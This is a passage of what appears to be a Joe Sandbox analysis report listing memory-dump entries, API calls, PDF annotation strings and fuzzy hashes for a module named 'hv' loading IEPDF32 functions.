                                                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 6C42FD3B
                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 6C42FD45
                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 6C42FD4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_6c370000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CapsDevice$Select$BitmapCreateDeleteModeStretchType
                                                                                                        • String ID:
                                                                                                        • API String ID: 3133578033-0
                                                                                                        • Opcode ID: a828d653b0fc3bc2b41e3bc3c775c91b1e23b52f7d671b26b31dbd18d714031c
                                                                                                        • Instruction ID: 1f839d77b786cce26cbf292b124fe6d15815de51469bba63cc6f0cc7d1fc67f5
                                                                                                        • Opcode Fuzzy Hash: a828d653b0fc3bc2b41e3bc3c775c91b1e23b52f7d671b26b31dbd18d714031c
                                                                                                        • Instruction Fuzzy Hash: 1331A071A007489FDB209F75C845A6BBBF4FF45700F008A2DE9A686651DB74E944CBA4
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_6c370000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ._l$Highlight$Subtype
                                                                                                        • API String ID: 0-2981372065
                                                                                                        • Opcode ID: 81c5e6122e59eb7bb2549b7a39cf7db162150e9669e973434d26241e348ecb36
                                                                                                        • Instruction ID: f3b983ee2586d095a9feff6960e3e749fb75bce17bd3d74aa55a60df9c1e0ea7
                                                                                                        • Opcode Fuzzy Hash: 81c5e6122e59eb7bb2549b7a39cf7db162150e9669e973434d26241e348ecb36
                                                                                                        • Instruction Fuzzy Hash: 4721F671F0111D8FFB04DE658880E7B7769EF88615F254929D9285BF50E730980A86D0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_6c370000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: #214
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1405426997-3862875103
                                                                                                        • Opcode ID: a41d0ebe7823f1382faa54b066779bb6f48bd41cca015a35415ad01b3bb38775
                                                                                                        • Instruction ID: 0020c53cf959333ae5ebda64a56ceeb75d2760cf233f1ebf2c21a2ca6d960539
                                                                                                        • Opcode Fuzzy Hash: a41d0ebe7823f1382faa54b066779bb6f48bd41cca015a35415ad01b3bb38775
                                                                                                        • Instruction Fuzzy Hash: 86518F317012198FDF20CF68C894EAEBBB5EF48619B50006AD856AB785DF30ED15CBA1
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: #214
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1405426997-3862875103
                                                                                                        • Opcode ID: 4f032cc5519f6c7e9f0be93eb075e0b717170ff322f08bb4b7780488c10f803d
                                                                                                        • Instruction ID: df966d40d4a1f361a361b36a4bf07c0ef07cb9592c002a7708b0c6ed28f1c561
                                                                                                        • Opcode Fuzzy Hash: 4f032cc5519f6c7e9f0be93eb075e0b717170ff322f08bb4b7780488c10f803d
                                                                                                        • Instruction Fuzzy Hash: 8EC1F731B0021A9BDF14EF78C8919BFB7B5EF9A718B100469D9166B341DB38ED05CBA1
                                                                                                        APIs
                                                                                                        • #73.IEPDF32(?), ref: 6BE6D777
                                                                                                          • Part of subcall function 6BE6CEE0: #70.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BE6CEEB
                                                                                                        • #73.IEPDF32(?), ref: 6BE6D80A
                                                                                                        • #73.IEPDF32(00000000,?,?,Rect), ref: 6BE6D915
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BBox$Rect
                                                                                                        • API String ID: 0-3854271352
                                                                                                        • Opcode ID: d89f2ddaeca1d69ea953fd4e68f2e148909cb14a43190244d13c1793c7facab5
                                                                                                        • Instruction ID: 36ce56749b17738ca5ea882b09baba6ccaaa3b21b0ef9045648ee252022aa190
                                                                                                        • Opcode Fuzzy Hash: d89f2ddaeca1d69ea953fd4e68f2e148909cb14a43190244d13c1793c7facab5
                                                                                                        • Instruction Fuzzy Hash: FEC11B35B402195FDB04DF74D881ABEB7B5FF89758F604528E915AB340EB34E911C7A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C01B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C025000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C0EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C126000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C13C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C155000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C17A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C18F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1BF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006C1CB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949014806.000000006C1CF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949068075.000000006C1D3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949104916.000000006C1DB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1949135568.000000006C1DF000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_6bd90000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Annot$Type
                                                                                                        • API String ID: 0-395718979
                                                                                                        • Opcode ID: a43be9cd971e03d4b482acc2047e5dfadc9f549897ada6f8355b2c4c170c2f00
                                                                                                        • Instruction ID: 01f8b8e2dc567c53d10f44513a5242a277d3d63fc33d9710d873372f54d327a9
                                                                                                        • Opcode Fuzzy Hash: a43be9cd971e03d4b482acc2047e5dfadc9f549897ada6f8355b2c4c170c2f00
                                                                                                        • Instruction Fuzzy Hash: 8CB1C375B406198FDB14CF74C88176EB7B5FF89384F104899D91AAB381EB38AD06CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.1939458887.000000006BE46000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD90000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.1939426958.000000006BD90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD91000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BD9A000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BED4000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF03000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1939458887.000000006BF16000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.1947911425.000000006BFFA000.00000002.00000001.01000000.00000009.sdmpDownload File
